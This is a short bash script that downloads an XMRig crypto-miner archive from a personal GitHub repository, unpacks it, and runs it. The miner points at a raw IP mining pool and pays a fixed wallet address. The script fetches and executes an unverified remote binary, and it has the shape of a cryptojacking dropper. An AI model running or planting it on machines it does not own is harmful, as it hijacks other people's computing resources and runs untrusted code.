#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --coin=SAL --donate-level 1 -o 188.166.186.218:443 -u 89qNbkmZXFqeXnKsNs6DBPP98RLC79PkFP3J423qGPqgZGr76sVvkXgSj1oK8jrEm1dGKNLzxrVEMWWiekKjEBoQ5dRYmUk -p b -a rx/0
